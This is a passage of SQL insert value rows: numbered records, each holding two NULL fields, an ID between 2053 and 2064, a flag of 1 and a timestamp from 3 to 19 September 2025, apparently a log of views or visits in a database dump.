(19636, NULL, NULL, 2058, 1, '2025-09-03 08:08:34'),
(19637, NULL, NULL, 2055, 1, '2025-09-03 09:17:45'),
(19638, NULL, NULL, 2064, 1, '2025-09-03 09:34:06'),
(19639, NULL, NULL, 2063, 1, '2025-09-03 10:27:16'),
(19640, NULL, NULL, 2064, 1, '2025-09-03 10:51:30'),
(19641, NULL, NULL, 2062, 1, '2025-09-03 11:01:42'),
(19642, NULL, NULL, 2061, 1, '2025-09-03 13:32:15'),
(19643, NULL, NULL, 2060, 1, '2025-09-03 13:50:25'),
(19644, NULL, NULL, 2062, 1, '2025-09-03 15:18:09'),
(19645, NULL, NULL, 2064, 1, '2025-09-03 16:36:19'),
(19646, NULL, NULL, 2060, 1, '2025-09-03 18:57:09'),
(19647, NULL, NULL, 2061, 1, '2025-09-03 19:14:39'),
(19648, NULL, NULL, 2060, 1, '2025-09-03 21:30:34'),
(19649, NULL, NULL, 2061, 1, '2025-09-03 22:32:41'),
(19650, NULL, NULL, 2064, 1, '2025-09-03 22:34:50'),
(19651, NULL, NULL, 2054, 1, '2025-09-03 23:19:44'),
(19652, NULL, NULL, 2063, 1, '2025-09-03 23:28:25'),
(19653, NULL, NULL, 2058, 1, '2025-09-04 00:43:37'),
(19654, NULL, NULL, 2059, 1, '2025-09-04 01:27:53'),
(19655, NULL, NULL, 2061, 1, '2025-09-04 02:14:07'),
(19656, NULL, NULL, 2063, 1, '2025-09-04 05:14:29'),
(19657, NULL, NULL, 2062, 1, '2025-09-04 06:53:12'),
(19658, NULL, NULL, 2064, 1, '2025-09-04 12:13:24'),
(19659, NULL, NULL, 2061, 1, '2025-09-04 13:24:09'),
(19660, NULL, NULL, 2062, 1, '2025-09-04 15:24:55'),
(19661, NULL, NULL, 2059, 1, '2025-09-04 17:43:48'),
(19662, NULL, NULL, 2064, 1, '2025-09-04 22:27:13'),
(19663, NULL, NULL, 2060, 1, '2025-09-04 23:49:30'),
(19664, NULL, NULL, 2053, 1, '2025-09-05 01:45:14'),
(19665, NULL, NULL, 2064, 1, '2025-09-05 02:26:19'),
(19666, NULL, NULL, 2060, 1, '2025-09-05 02:38:50'),
(19667, NULL, NULL, 2060, 1, '2025-09-05 02:55:59'),
(19668, NULL, NULL, 2064, 1, '2025-09-05 04:01:48'),
(19669, NULL, NULL, 2061, 1, '2025-09-05 07:39:58'),
(19670, NULL, NULL, 2061, 1, '2025-09-05 09:13:12'),
(19671, NULL, NULL, 2060, 1, '2025-09-05 11:13:08'),
(19672, NULL, NULL, 2062, 1, '2025-09-05 15:34:29'),
(19673, NULL, NULL, 2064, 1, '2025-09-05 16:05:09'),
(19674, NULL, NULL, 2061, 1, '2025-09-05 20:07:45'),
(19675, NULL, NULL, 2063, 1, '2025-09-05 22:42:27'),
(19676, NULL, NULL, 2061, 1, '2025-09-05 22:42:30'),
(19677, NULL, NULL, 2062, 1, '2025-09-05 22:42:38'),
(19678, NULL, NULL, 2064, 1, '2025-09-05 23:59:46'),
(19679, NULL, NULL, 2063, 1, '2025-09-06 00:19:14'),
(19680, NULL, NULL, 2060, 1, '2025-09-06 01:53:34'),
(19681, NULL, NULL, 2061, 1, '2025-09-06 02:50:33'),
(19682, NULL, NULL, 2054, 1, '2025-09-06 03:04:31'),
(19683, NULL, NULL, 2055, 1, '2025-09-06 03:09:07'),
(19684, NULL, NULL, 2054, 1, '2025-09-06 03:19:33'),
(19685, NULL, NULL, 2062, 1, '2025-09-06 03:27:58'),
(19686, NULL, NULL, 2061, 1, '2025-09-06 03:49:23'),
(19687, NULL, NULL, 2064, 1, '2025-09-06 07:32:11'),
(19688, NULL, NULL, 2061, 1, '2025-09-06 08:16:36'),
(19689, NULL, NULL, 2064, 1, '2025-09-06 09:31:59'),
(19690, NULL, NULL, 2063, 1, '2025-09-06 09:43:40'),
(19691, NULL, NULL, 2060, 1, '2025-09-06 10:23:06'),
(19692, NULL, NULL, 2063, 1, '2025-09-06 10:46:04'),
(19693, NULL, NULL, 2058, 1, '2025-09-06 11:16:30'),
(19694, NULL, NULL, 2058, 1, '2025-09-06 11:51:29'),
(19695, NULL, NULL, 2064, 1, '2025-09-06 13:55:19'),
(19696, NULL, NULL, 2060, 1, '2025-09-06 14:41:26'),
(19697, NULL, NULL, 2064, 1, '2025-09-06 16:09:39'),
(19698, NULL, NULL, 2059, 1, '2025-09-06 16:21:19'),
(19699, NULL, NULL, 2058, 1, '2025-09-06 16:29:02'),
(19700, NULL, NULL, 2058, 1, '2025-09-06 17:29:00'),
(19701, NULL, NULL, 2063, 1, '2025-09-06 19:02:22'),
(19702, NULL, NULL, 2060, 1, '2025-09-06 22:18:24'),
(19703, NULL, NULL, 2053, 1, '2025-09-06 22:52:23'),
(19704, NULL, NULL, 2059, 1, '2025-09-06 23:13:16'),
(19705, NULL, NULL, 2061, 1, '2025-09-06 23:51:47'),
(19706, NULL, NULL, 2058, 1, '2025-09-07 01:28:27'),
(19707, NULL, NULL, 2055, 1, '2025-09-07 01:29:42'),
(19708, NULL, NULL, 2054, 1, '2025-09-07 01:32:47'),
(19709, NULL, NULL, 2061, 1, '2025-09-07 03:39:21'),
(19710, NULL, NULL, 2064, 1, '2025-09-07 03:43:49'),
(19711, NULL, NULL, 2064, 1, '2025-09-07 04:22:43'),
(19712, NULL, NULL, 2060, 1, '2025-09-07 04:35:44'),
(19713, NULL, NULL, 2064, 1, '2025-09-07 04:57:25'),
(19714, NULL, NULL, 2064, 1, '2025-09-07 06:27:58'),
(19715, NULL, NULL, 2059, 1, '2025-09-07 07:06:26'),
(19716, NULL, NULL, 2060, 1, '2025-09-07 07:06:30'),
(19717, NULL, NULL, 2061, 1, '2025-09-07 09:50:08'),
(19718, NULL, NULL, 2061, 1, '2025-09-07 11:37:22'),
(19719, NULL, NULL, 2055, 1, '2025-09-07 11:49:42'),
(19720, NULL, NULL, 2062, 1, '2025-09-07 13:30:22'),
(19721, NULL, NULL, 2058, 1, '2025-09-07 15:17:09'),
(19722, NULL, NULL, 2058, 1, '2025-09-07 15:17:14'),
(19723, NULL, NULL, 2064, 1, '2025-09-07 15:29:41'),
(19724, NULL, NULL, 2060, 1, '2025-09-07 17:33:22'),
(19725, NULL, NULL, 2063, 1, '2025-09-07 17:42:41'),
(19726, NULL, NULL, 2058, 1, '2025-09-07 18:09:24'),
(19727, NULL, NULL, 2060, 1, '2025-09-07 18:19:49'),
(19728, NULL, NULL, 2055, 1, '2025-09-07 19:06:08'),
(19729, NULL, NULL, 2061, 1, '2025-09-07 19:43:05'),
(19730, NULL, NULL, 2060, 1, '2025-09-07 19:45:41'),
(19731, NULL, NULL, 2064, 1, '2025-09-07 20:02:24'),
(19732, NULL, NULL, 2061, 1, '2025-09-07 20:26:34'),
(19733, NULL, NULL, 2062, 1, '2025-09-07 21:07:15'),
(19734, NULL, NULL, 2054, 1, '2025-09-07 22:27:36'),
(19735, NULL, NULL, 2059, 1, '2025-09-07 22:43:44'),
(19736, NULL, NULL, 2064, 1, '2025-09-07 22:56:36'),
(19737, NULL, NULL, 2058, 1, '2025-09-07 23:19:12'),
(19738, NULL, NULL, 2054, 1, '2025-09-07 23:35:01'),
(19739, NULL, NULL, 2060, 1, '2025-09-08 00:21:22'),
(19740, NULL, NULL, 2060, 1, '2025-09-08 01:31:37'),
(19741, NULL, NULL, 2063, 1, '2025-09-08 01:40:49'),
(19742, NULL, NULL, 2058, 1, '2025-09-08 02:09:51'),
(19743, NULL, NULL, 2055, 1, '2025-09-08 03:10:41'),
(19744, NULL, NULL, 2061, 1, '2025-09-08 04:35:26'),
(19745, NULL, NULL, 2060, 1, '2025-09-08 05:10:44'),
(19746, NULL, NULL, 2062, 1, '2025-09-08 05:13:08'),
(19747, NULL, NULL, 2054, 1, '2025-09-08 06:36:11'),
(19748, NULL, NULL, 2059, 1, '2025-09-08 06:54:03'),
(19749, NULL, NULL, 2062, 1, '2025-09-08 06:54:05'),
(19750, NULL, NULL, 2064, 1, '2025-09-08 07:08:33'),
(19751, NULL, NULL, 2064, 1, '2025-09-08 07:10:10'),
(19752, NULL, NULL, 2061, 1, '2025-09-08 07:10:38'),
(19753, NULL, NULL, 2061, 1, '2025-09-08 08:15:29'),
(19754, NULL, NULL, 2060, 1, '2025-09-08 08:30:28'),
(19755, NULL, NULL, 2058, 1, '2025-09-08 12:05:43'),
(19756, NULL, NULL, 2061, 1, '2025-09-08 12:33:54'),
(19757, NULL, NULL, 2062, 1, '2025-09-08 13:18:43'),
(19758, NULL, NULL, 2060, 1, '2025-09-08 14:03:31'),
(19759, NULL, NULL, 2054, 1, '2025-09-08 14:12:20'),
(19760, NULL, NULL, 2060, 1, '2025-09-08 14:34:09'),
(19761, NULL, NULL, 2064, 1, '2025-09-08 15:31:04'),
(19762, NULL, NULL, 2059, 1, '2025-09-08 16:52:02'),
(19763, NULL, NULL, 2064, 1, '2025-09-08 19:10:08'),
(19764, NULL, NULL, 2061, 1, '2025-09-08 19:46:21'),
(19765, NULL, NULL, 2064, 1, '2025-09-09 02:29:49'),
(19766, NULL, NULL, 2063, 1, '2025-09-09 02:34:33'),
(19767, NULL, NULL, 2055, 1, '2025-09-09 03:03:00'),
(19768, NULL, NULL, 2063, 1, '2025-09-09 04:36:14'),
(19769, NULL, NULL, 2061, 1, '2025-09-09 06:40:37'),
(19770, NULL, NULL, 2063, 1, '2025-09-09 09:34:43'),
(19771, NULL, NULL, 2060, 1, '2025-09-09 10:43:16'),
(19772, NULL, NULL, 2060, 1, '2025-09-09 11:01:32'),
(19773, NULL, NULL, 2058, 1, '2025-09-09 11:11:33'),
(19774, NULL, NULL, 2055, 1, '2025-09-09 12:22:10'),
(19775, NULL, NULL, 2062, 1, '2025-09-09 13:28:57'),
(19776, NULL, NULL, 2061, 1, '2025-09-09 14:57:13'),
(19777, NULL, NULL, 2063, 1, '2025-09-09 14:59:30'),
(19778, NULL, NULL, 2064, 1, '2025-09-09 16:16:56'),
(19779, NULL, NULL, 2061, 1, '2025-09-09 18:09:05'),
(19780, NULL, NULL, 2058, 1, '2025-09-09 18:09:10'),
(19781, NULL, NULL, 2063, 1, '2025-09-09 18:09:12'),
(19782, NULL, NULL, 2059, 1, '2025-09-09 18:09:14'),
(19783, NULL, NULL, 2064, 1, '2025-09-09 18:09:16'),
(19784, NULL, NULL, 2062, 1, '2025-09-09 18:09:18'),
(19785, NULL, NULL, 2060, 1, '2025-09-09 18:09:23'),
(19786, NULL, NULL, 2054, 1, '2025-09-09 18:09:26'),
(19787, NULL, NULL, 2055, 1, '2025-09-09 18:09:28'),
(19788, NULL, NULL, 2053, 1, '2025-09-09 18:09:48'),
(19789, NULL, NULL, 2060, 1, '2025-09-09 19:47:23'),
(19790, NULL, NULL, 2054, 1, '2025-09-09 19:48:41'),
(19791, NULL, NULL, 2058, 1, '2025-09-09 19:48:49'),
(19792, NULL, NULL, 2064, 1, '2025-09-09 20:24:25'),
(19793, NULL, NULL, 2060, 1, '2025-09-09 21:11:19'),
(19794, NULL, NULL, 2064, 1, '2025-09-09 21:19:36'),
(19795, NULL, NULL, 2054, 1, '2025-09-09 22:45:28'),
(19796, NULL, NULL, 2064, 1, '2025-09-10 02:47:33'),
(19797, NULL, NULL, 2062, 1, '2025-09-10 04:19:04'),
(19798, NULL, NULL, 2061, 1, '2025-09-10 07:18:28'),
(19799, NULL, NULL, 2061, 1, '2025-09-10 09:23:38'),
(19800, NULL, NULL, 2064, 1, '2025-09-10 10:14:45'),
(19801, NULL, NULL, 2062, 1, '2025-09-10 10:15:21'),
(19802, NULL, NULL, 2055, 1, '2025-09-10 10:15:35'),
(19803, NULL, NULL, 2061, 1, '2025-09-10 10:15:48'),
(19804, NULL, NULL, 2062, 1, '2025-09-10 10:16:16'),
(19805, NULL, NULL, 2061, 1, '2025-09-10 10:16:45'),
(19806, NULL, NULL, 2059, 1, '2025-09-10 10:38:02'),
(19807, NULL, NULL, 2060, 1, '2025-09-10 10:40:07'),
(19808, NULL, NULL, 2063, 1, '2025-09-10 10:40:38'),
(19809, NULL, NULL, 2054, 1, '2025-09-10 10:40:48'),
(19810, NULL, NULL, 2054, 1, '2025-09-10 10:41:38'),
(19811, NULL, NULL, 2064, 1, '2025-09-10 10:41:49'),
(19812, NULL, NULL, 2064, 1, '2025-09-10 10:42:44'),
(19813, NULL, NULL, 2058, 1, '2025-09-10 10:45:32'),
(19814, NULL, NULL, 2059, 1, '2025-09-10 11:36:37'),
(19815, NULL, NULL, 2061, 1, '2025-09-10 11:42:14'),
(19816, NULL, NULL, 2060, 1, '2025-09-10 13:50:01'),
(19817, NULL, NULL, 2064, 1, '2025-09-10 14:27:15'),
(19818, NULL, NULL, 2062, 1, '2025-09-10 14:36:48'),
(19819, NULL, NULL, 2054, 1, '2025-09-10 15:47:18'),
(19820, NULL, NULL, 2064, 1, '2025-09-10 16:13:56'),
(19821, NULL, NULL, 2064, 1, '2025-09-10 16:46:29'),
(19822, NULL, NULL, 2062, 1, '2025-09-10 19:07:12'),
(19823, NULL, NULL, 2060, 1, '2025-09-10 21:32:16'),
(19824, NULL, NULL, 2061, 1, '2025-09-10 22:26:35'),
(19825, NULL, NULL, 2060, 1, '2025-09-10 23:58:23'),
(19826, NULL, NULL, 2062, 1, '2025-09-11 01:17:46'),
(19827, NULL, NULL, 2061, 1, '2025-09-11 01:28:42'),
(19828, NULL, NULL, 2055, 1, '2025-09-11 01:37:41'),
(19829, NULL, NULL, 2061, 1, '2025-09-11 02:27:13'),
(19830, NULL, NULL, 2064, 1, '2025-09-11 02:36:26'),
(19831, NULL, NULL, 2060, 1, '2025-09-11 02:38:14'),
(19832, NULL, NULL, 2060, 1, '2025-09-11 05:46:50'),
(19833, NULL, NULL, 2064, 1, '2025-09-11 07:38:13'),
(19834, NULL, NULL, 2063, 1, '2025-09-11 07:46:32'),
(19835, NULL, NULL, 2054, 1, '2025-09-11 08:08:16'),
(19836, NULL, NULL, 2063, 1, '2025-09-11 08:27:01'),
(19837, NULL, NULL, 2062, 1, '2025-09-11 14:18:21'),
(19838, NULL, NULL, 2064, 1, '2025-09-11 14:40:51'),
(19839, NULL, NULL, 2060, 1, '2025-09-11 15:10:13'),
(19840, NULL, NULL, 2061, 1, '2025-09-11 15:17:02'),
(19841, NULL, NULL, 2059, 1, '2025-09-11 16:28:25'),
(19842, NULL, NULL, 2059, 1, '2025-09-11 16:37:53'),
(19843, NULL, NULL, 2059, 1, '2025-09-11 16:38:47'),
(19844, NULL, NULL, 2059, 1, '2025-09-11 16:39:14'),
(19845, NULL, NULL, 2059, 1, '2025-09-11 17:02:36'),
(19846, NULL, NULL, 2059, 1, '2025-09-11 17:40:14'),
(19847, NULL, NULL, 2064, 1, '2025-09-11 19:29:51'),
(19848, NULL, NULL, 2059, 1, '2025-09-11 19:47:29'),
(19849, NULL, NULL, 2058, 1, '2025-09-11 19:58:17'),
(19850, NULL, NULL, 2061, 1, '2025-09-11 20:03:04'),
(19851, NULL, NULL, 2061, 1, '2025-09-11 22:25:50'),
(19852, NULL, NULL, 2064, 1, '2025-09-12 00:01:41'),
(19853, NULL, NULL, 2053, 1, '2025-09-12 01:39:33'),
(19854, NULL, NULL, 2062, 1, '2025-09-12 01:52:41'),
(19855, NULL, NULL, 2060, 1, '2025-09-12 01:57:43'),
(19856, NULL, NULL, 2064, 1, '2025-09-12 05:34:45'),
(19857, NULL, NULL, 2060, 1, '2025-09-12 06:40:48'),
(19858, NULL, NULL, 2060, 1, '2025-09-12 07:27:42'),
(19859, NULL, NULL, 2064, 1, '2025-09-12 07:32:14'),
(19860, NULL, NULL, 2061, 1, '2025-09-12 07:50:11'),
(19861, NULL, NULL, 2064, 1, '2025-09-12 08:45:54'),
(19862, NULL, NULL, 2062, 1, '2025-09-12 08:53:43'),
(19863, NULL, NULL, 2060, 1, '2025-09-12 12:52:38'),
(19864, NULL, NULL, 2062, 1, '2025-09-12 14:20:44'),
(19865, NULL, NULL, 2063, 1, '2025-09-12 14:50:51'),
(19866, NULL, NULL, 2061, 1, '2025-09-12 16:51:27'),
(19867, NULL, NULL, 2060, 1, '2025-09-12 16:58:57'),
(19868, NULL, NULL, 2059, 1, '2025-09-12 19:22:14'),
(19869, NULL, NULL, 2058, 1, '2025-09-12 21:18:16'),
(19870, NULL, NULL, 2064, 1, '2025-09-12 21:51:55'),
(19871, NULL, NULL, 2062, 1, '2025-09-12 22:40:46'),
(19872, NULL, NULL, 2063, 1, '2025-09-12 22:40:50'),
(19873, NULL, NULL, 2061, 1, '2025-09-12 22:40:54'),
(19874, NULL, NULL, 2064, 1, '2025-09-12 23:35:46'),
(19875, NULL, NULL, 2060, 1, '2025-09-13 00:38:39'),
(19876, NULL, NULL, 2059, 1, '2025-09-13 03:51:01'),
(19877, NULL, NULL, 2064, 1, '2025-09-13 05:35:54'),
(19878, NULL, NULL, 2064, 1, '2025-09-13 06:04:45'),
(19879, NULL, NULL, 2061, 1, '2025-09-13 10:59:07'),
(19880, NULL, NULL, 2062, 1, '2025-09-13 13:43:04'),
(19881, NULL, NULL, 2061, 1, '2025-09-13 14:12:52'),
(19882, NULL, NULL, 2054, 1, '2025-09-13 15:06:36'),
(19883, NULL, NULL, 2060, 1, '2025-09-13 16:55:29'),
(19884, NULL, NULL, 2064, 1, '2025-09-13 17:39:57'),
(19885, NULL, NULL, 2060, 1, '2025-09-13 17:48:22'),
(19886, NULL, NULL, 2064, 1, '2025-09-14 01:20:35'),
(19887, NULL, NULL, 2064, 1, '2025-09-14 04:40:34'),
(19888, NULL, NULL, 2060, 1, '2025-09-14 04:41:47'),
(19889, NULL, NULL, 2059, 1, '2025-09-14 06:43:31'),
(19890, NULL, NULL, 2060, 1, '2025-09-14 06:43:34'),
(19891, NULL, NULL, 2053, 1, '2025-09-14 06:45:59'),
(19892, NULL, NULL, 2061, 1, '2025-09-14 07:28:42'),
(19893, NULL, NULL, 2060, 1, '2025-09-14 07:44:04'),
(19894, NULL, NULL, 2055, 1, '2025-09-14 08:40:34'),
(19895, NULL, NULL, 2063, 1, '2025-09-14 08:51:58'),
(19896, NULL, NULL, 2064, 1, '2025-09-14 10:42:36'),
(19897, NULL, NULL, 2055, 1, '2025-09-14 11:45:47'),
(19898, NULL, NULL, 2054, 1, '2025-09-14 12:02:07'),
(19899, NULL, NULL, 2055, 1, '2025-09-14 12:02:10'),
(19900, NULL, NULL, 2061, 1, '2025-09-14 12:02:11'),
(19901, NULL, NULL, 2058, 1, '2025-09-14 12:02:14'),
(19902, NULL, NULL, 2064, 1, '2025-09-14 12:02:15'),
(19903, NULL, NULL, 2059, 1, '2025-09-14 12:02:16'),
(19904, NULL, NULL, 2063, 1, '2025-09-14 12:02:17'),
(19905, NULL, NULL, 2062, 1, '2025-09-14 12:02:19'),
(19906, NULL, NULL, 2060, 1, '2025-09-14 12:02:24'),
(19907, NULL, NULL, 2053, 1, '2025-09-14 12:02:28'),
(19908, NULL, NULL, 2054, 1, '2025-09-14 12:36:39'),
(19909, NULL, NULL, 2064, 1, '2025-09-14 15:17:05'),
(19910, NULL, NULL, 2062, 1, '2025-09-14 15:31:50'),
(19911, NULL, NULL, 2058, 1, '2025-09-14 18:54:23'),
(19912, NULL, NULL, 2061, 1, '2025-09-14 20:54:51'),
(19913, NULL, NULL, 2061, 1, '2025-09-14 20:57:50'),
(19914, NULL, NULL, 2060, 1, '2025-09-14 20:58:04'),
(19915, NULL, NULL, 2064, 1, '2025-09-14 21:06:09'),
(19916, NULL, NULL, 2064, 1, '2025-09-14 21:08:44'),
(19917, NULL, NULL, 2054, 1, '2025-09-14 21:47:02'),
(19918, NULL, NULL, 2062, 1, '2025-09-14 22:00:17'),
(19919, NULL, NULL, 2061, 1, '2025-09-14 22:00:22'),
(19920, NULL, NULL, 2064, 1, '2025-09-14 22:00:26'),
(19921, NULL, NULL, 2054, 1, '2025-09-14 22:00:28'),
(19922, NULL, NULL, 2063, 1, '2025-09-14 22:01:04'),
(19923, NULL, NULL, 2058, 1, '2025-09-14 22:01:05'),
(19924, NULL, NULL, 2060, 1, '2025-09-14 22:01:23'),
(19925, NULL, NULL, 2059, 1, '2025-09-14 22:02:20'),
(19926, NULL, NULL, 2060, 1, '2025-09-14 22:16:21'),
(19927, NULL, NULL, 2059, 1, '2025-09-15 00:03:56'),
(19928, NULL, NULL, 2062, 1, '2025-09-15 03:29:57'),
(19929, NULL, NULL, 2061, 1, '2025-09-15 06:06:12'),
(19930, NULL, NULL, 2060, 1, '2025-09-15 06:09:16'),
(19931, NULL, NULL, 2064, 1, '2025-09-15 06:46:34'),
(19932, NULL, NULL, 2061, 1, '2025-09-15 07:18:41'),
(19933, NULL, NULL, 2055, 1, '2025-09-15 08:23:01'),
(19934, NULL, NULL, 2063, 1, '2025-09-15 08:23:04'),
(19935, NULL, NULL, 2062, 1, '2025-09-15 08:23:07'),
(19936, NULL, NULL, 2060, 1, '2025-09-15 08:23:10'),
(19937, NULL, NULL, 2058, 1, '2025-09-15 08:48:46'),
(19938, NULL, NULL, 2055, 1, '2025-09-15 12:22:49'),
(19939, NULL, NULL, 2061, 1, '2025-09-15 12:29:47'),
(19940, NULL, NULL, 2064, 1, '2025-09-15 13:45:38'),
(19941, NULL, NULL, 2055, 1, '2025-09-15 14:28:26'),
(19942, NULL, NULL, 2064, 1, '2025-09-15 14:46:43'),
(19943, NULL, NULL, 2064, 1, '2025-09-15 15:10:59'),
(19944, NULL, NULL, 2062, 1, '2025-09-15 15:18:28'),
(19945, NULL, NULL, 2064, 1, '2025-09-15 16:37:49'),
(19946, NULL, NULL, 2060, 1, '2025-09-15 21:00:07'),
(19947, NULL, NULL, 2058, 1, '2025-09-15 21:00:26'),
(19948, NULL, NULL, 2064, 1, '2025-09-15 21:01:43'),
(19949, NULL, NULL, 2059, 1, '2025-09-15 21:02:17'),
(19950, NULL, NULL, 2055, 1, '2025-09-15 21:06:49'),
(19951, NULL, NULL, 2061, 1, '2025-09-15 21:12:52'),
(19952, NULL, NULL, 2061, 1, '2025-09-15 21:14:47'),
(19953, NULL, NULL, 2053, 1, '2025-09-15 21:17:41'),
(19954, NULL, NULL, 2053, 1, '2025-09-15 21:24:04'),
(19955, NULL, NULL, 2054, 1, '2025-09-15 21:33:28'),
(19956, NULL, NULL, 2053, 1, '2025-09-15 21:52:27'),
(19957, NULL, NULL, 2055, 1, '2025-09-15 21:53:56'),
(19958, NULL, NULL, 2063, 1, '2025-09-15 22:00:41'),
(19959, NULL, NULL, 2060, 1, '2025-09-16 02:15:54'),
(19960, NULL, NULL, 2060, 1, '2025-09-16 02:18:44'),
(19961, NULL, NULL, 2064, 1, '2025-09-16 02:47:49'),
(19962, NULL, NULL, 2063, 1, '2025-09-16 02:56:18'),
(19963, NULL, NULL, 2058, 1, '2025-09-16 02:59:47'),
(19964, NULL, NULL, 2060, 1, '2025-09-16 06:55:05'),
(19965, NULL, NULL, 2062, 1, '2025-09-16 08:45:08'),
(19966, NULL, NULL, 2061, 1, '2025-09-16 08:52:59'),
(19967, NULL, NULL, 2055, 1, '2025-09-16 09:05:45'),
(19968, NULL, NULL, 2054, 1, '2025-09-16 09:14:17'),
(19969, NULL, NULL, 2064, 1, '2025-09-16 10:45:45'),
(19970, NULL, NULL, 2060, 1, '2025-09-16 11:10:01'),
(19971, NULL, NULL, 2063, 1, '2025-09-16 11:19:07'),
(19972, NULL, NULL, 2058, 1, '2025-09-16 11:25:23'),
(19973, NULL, NULL, 2054, 1, '2025-09-16 11:32:02'),
(19974, NULL, NULL, 2059, 1, '2025-09-16 11:34:06'),
(19975, NULL, NULL, 2064, 1, '2025-09-16 12:35:36'),
(19976, NULL, NULL, 2064, 1, '2025-09-16 13:08:17'),
(19977, NULL, NULL, 2054, 1, '2025-09-16 14:08:47'),
(19978, NULL, NULL, 2060, 1, '2025-09-16 15:07:37'),
(19979, NULL, NULL, 2064, 1, '2025-09-16 15:41:19'),
(19980, NULL, NULL, 2062, 1, '2025-09-16 15:55:46'),
(19981, NULL, NULL, 2061, 1, '2025-09-16 16:08:11'),
(19982, NULL, NULL, 2061, 1, '2025-09-16 17:46:57'),
(19983, NULL, NULL, 2060, 1, '2025-09-16 17:51:31'),
(19984, NULL, NULL, 2054, 1, '2025-09-16 18:05:56'),
(19985, NULL, NULL, 2054, 1, '2025-09-16 19:52:39'),
(19986, NULL, NULL, 2058, 1, '2025-09-16 19:52:47'),
(19987, NULL, NULL, 2061, 1, '2025-09-16 21:50:44'),
(19988, NULL, NULL, 2053, 1, '2025-09-16 22:04:35'),
(19989, NULL, NULL, 2061, 1, '2025-09-17 00:37:34'),
(19990, NULL, NULL, 2061, 1, '2025-09-17 00:40:01'),
(19991, NULL, NULL, 2058, 1, '2025-09-17 01:41:03'),
(19992, NULL, NULL, 2064, 1, '2025-09-17 01:55:18'),
(19993, NULL, NULL, 2059, 1, '2025-09-17 02:00:27'),
(19994, NULL, NULL, 2064, 1, '2025-09-17 03:03:27'),
(19995, NULL, NULL, 2059, 1, '2025-09-17 05:16:36'),
(19996, NULL, NULL, 2061, 1, '2025-09-17 05:27:37'),
(19997, NULL, NULL, 2053, 1, '2025-09-17 06:37:37'),
(19998, NULL, NULL, 2059, 1, '2025-09-17 07:34:10'),
(19999, NULL, NULL, 2064, 1, '2025-09-17 08:51:26'),
(20000, NULL, NULL, 2060, 1, '2025-09-17 09:14:43'),
(20001, NULL, NULL, 2064, 1, '2025-09-17 10:07:51'),
(20002, NULL, NULL, 2061, 1, '2025-09-17 12:34:55'),
(20003, NULL, NULL, 2060, 1, '2025-09-17 13:36:58'),
(20004, NULL, NULL, 2064, 1, '2025-09-17 13:38:00'),
(20005, NULL, NULL, 2060, 1, '2025-09-17 15:52:47'),
(20006, NULL, NULL, 2062, 1, '2025-09-17 16:13:49'),
(20007, NULL, NULL, 2054, 1, '2025-09-17 17:23:10'),
(20008, NULL, NULL, 2060, 1, '2025-09-17 18:17:06'),
(20009, NULL, NULL, 2062, 1, '2025-09-17 20:41:41'),
(20010, NULL, NULL, 2058, 1, '2025-09-17 20:57:27'),
(20011, NULL, NULL, 2059, 1, '2025-09-17 22:39:56'),
(20012, NULL, NULL, 2061, 1, '2025-09-17 23:10:30'),
(20013, NULL, NULL, 2060, 1, '2025-09-17 23:28:06'),
(20014, NULL, NULL, 2055, 1, '2025-09-18 00:59:11'),
(20015, NULL, NULL, 2063, 1, '2025-09-18 01:20:50'),
(20016, NULL, NULL, 2061, 1, '2025-09-18 06:31:16'),
(20017, NULL, NULL, 2064, 1, '2025-09-18 07:13:58'),
(20018, NULL, NULL, 2060, 1, '2025-09-18 08:06:52'),
(20019, NULL, NULL, 2064, 1, '2025-09-18 09:04:58'),
(20020, NULL, NULL, 2055, 1, '2025-09-18 10:06:20'),
(20021, NULL, NULL, 2064, 1, '2025-09-18 10:06:32'),
(20022, NULL, NULL, 2055, 1, '2025-09-18 10:07:14'),
(20023, NULL, NULL, 2064, 1, '2025-09-18 10:07:32'),
(20024, NULL, NULL, 2060, 1, '2025-09-18 10:09:07'),
(20025, NULL, NULL, 2060, 1, '2025-09-18 10:09:57'),
(20026, NULL, NULL, 2061, 1, '2025-09-18 10:12:46'),
(20027, NULL, NULL, 2064, 1, '2025-09-18 10:22:31'),
(20028, NULL, NULL, 2062, 1, '2025-09-18 10:24:55'),
(20029, NULL, NULL, 2063, 1, '2025-09-18 10:25:16'),
(20030, NULL, NULL, 2064, 1, '2025-09-18 10:25:26'),
(20031, NULL, NULL, 2062, 1, '2025-09-18 10:25:47'),
(20032, NULL, NULL, 2064, 1, '2025-09-18 10:26:03'),
(20033, NULL, NULL, 2058, 1, '2025-09-18 10:26:13'),
(20034, NULL, NULL, 2059, 1, '2025-09-18 10:28:58'),
(20035, NULL, NULL, 2061, 1, '2025-09-18 11:56:27'),
(20036, NULL, NULL, 2062, 1, '2025-09-18 13:43:25'),
(20037, NULL, NULL, 2054, 1, '2025-09-18 14:21:38'),
(20038, NULL, NULL, 2054, 1, '2025-09-18 14:22:50'),
(20039, NULL, NULL, 2062, 1, '2025-09-18 15:25:13'),
(20040, NULL, NULL, 2059, 1, '2025-09-18 17:53:03'),
(20041, NULL, NULL, 2059, 1, '2025-09-18 17:53:58'),
(20042, NULL, NULL, 2059, 1, '2025-09-18 18:01:27'),
(20043, NULL, NULL, 2053, 1, '2025-09-18 18:14:40'),
(20044, NULL, NULL, 2061, 1, '2025-09-18 19:46:51'),
(20045, NULL, NULL, 2061, 1, '2025-09-18 20:02:04'),
(20046, NULL, NULL, 2062, 1, '2025-09-18 23:51:41'),
(20047, NULL, NULL, 2064, 1, '2025-09-19 00:02:55'),
(20048, NULL, NULL, 2064, 1, '2025-09-19 01:14:59'),
(20049, NULL, NULL, 2053, 1, '2025-09-19 01:47:34'),
(20050, NULL, NULL, 2060, 1, '2025-09-19 06:01:34'),
(20051, NULL, NULL, 2063, 1, '2025-09-19 07:49:33'),
(20052, NULL, NULL, 2061, 1, '2025-09-19 09:33:23'),
(20053, NULL, NULL, 2061, 1, '2025-09-19 11:24:46'),
(20054, NULL, NULL, 2060, 1, '2025-09-19 15:22:53'),
(20055, NULL, NULL, 2061, 1, '2025-09-19 16:24:08'),
(20056, NULL, NULL, 2062, 1, '2025-09-19 16:37:37'),
(20057, NULL, NULL, 2064, 1, '2025-09-19 17:43:37'),
(20058, NULL, NULL, 2063, 1, '2025-09-19 18:52:20'),
(20059, NULL, NULL, 2060, 1, '2025-09-19 20:32:31'),
(20060, NULL, NULL, 2064, 1, '2025-09-19 21:00:51'),
(20061, NULL, NULL, 2061, 1, '2025-09-19 22:46:36'),
(20062, NULL, NULL, 2062, 1, '2025-09-19 22:46:39'),
(20063, NULL, NULL, 2063, 1, '2025-09-19 22:46:42'),
